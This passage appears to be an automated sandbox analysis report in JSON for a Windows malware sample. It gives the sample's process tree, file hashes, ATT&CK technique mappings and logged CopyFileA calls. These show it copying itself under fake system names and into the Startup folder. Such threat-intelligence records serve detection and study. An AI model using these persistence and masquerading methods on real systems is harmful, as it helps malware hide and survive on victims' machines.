"%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "56484a087e449f8c7a5815f2e835e9f36caa1bf446533c71c3386d86f2bc0212"}, {"uid": "00000000-00004036", "parentuid": "00000000-00004380", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00001724", "parentuid": "00000000-00004380", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "de483c023d45a050eb96ce41dd87ccc4e92bc568baf049f71c367309dd1f739d"}, {"uid": "00000000-00002404", "parentuid": "00000000-00004380", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00002384", "parentuid": "00000000-00006024", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7371c170b17bab1ce11e0f8470bc6a04593ec3272bd6ef0836b4b7e04249f0a5"}, {"uid": "00000000-00004352", "parentuid": "00000000-00002384", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7371c170b17bab1ce11e0f8470bc6a04593ec3272bd6ef0836b4b7e04249f0a5"}, {"uid": "00000000-00002908", "parentuid": "00000000-00002384", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "98f1ce66b03bf910a5ceffa492e0ddf909e2e014eb259edfd94232fd8ab8a33c"}, {"uid": "00000000-00003496", "parentuid": "00000000-00002384", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "01832a714a6674a18d02e7d700a1da58864d124488f45e6b99433c112fe7e61e"}, {"uid": "00000000-00001980", "parentuid": "00000000-00002384", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "21e2f7376cdc6f34ddb316e26be76326a97125b580376e2862f777c0f7a4af56"}, {"uid": "00000000-00002192", "parentuid": "00000000-00006024", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "98f1ce66b03bf910a5ceffa492e0ddf909e2e014eb259edfd94232fd8ab8a33c"}, {"uid": "00000000-00003304", "parentuid": "00000000-00002192", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7371c170b17bab1ce11e0f8470bc6a04593ec3272bd6ef0836b4b7e04249f0a5"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 1, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e3a6b@ADVAPI32.dll\"\n \"0e000f00703f3a6b@ADVAPI32.dll\"\n \"0e000f00cc3f3a6b@ADVAPI32.dll\"\n \"11001200b4473a6b@ADVAPI32.dll\"\n \"1100120048483a6b@ADVAPI32.dll\"\n \"120013008c483a6b@ADVAPI32.dll\"\n \"12001300e4483a6b@ADVAPI32.dll\"\n \"14001500386e3a6b@ADVAPI32.dll\"\n \"14001500506e3a6b@ADVAPI32.dll\"\n \"14001500686e3a6b@ADVAPI32.dll\"\n \"17001800806e3a6b@ADVAPI32.dll\"\n \"0d000e00986e3a6b@ADVAPI32.dll\"\n \"11001200a86e3a6b@ADVAPI32.dll\"\n \"11001200bc6e3a6b@ADVAPI32.dll\"\n \"0f001000fc6f3a6b@ADVAPI32.dll\"\n \"140015003c703a6b@ADVAPI32.dll\"\n \"1400150054703a6b@ADVAPI32.dll\"\n \"0c000d009c703a6b@ADVAPI32.dll\"\n \"0c000d00ac703a6b@ADVAPI32.dll\"\n \"0e000f00bc703a6b@ADVAPI32.dll\"\n \"0e000f00cc703a6b@ADVAPI32.dll\"\n \"0b000c00dc703a6b@ADVAPI32.dll\"\n \"1800190014733a6b@RPCRT4.dll\"\n \"1300140040733a6b@RPCRT4.dll\"\n \"1400150054733a6b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location C:\\4k51k4.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location C:\\4k51k4.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy C:\\\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CopyFileA\" to copy 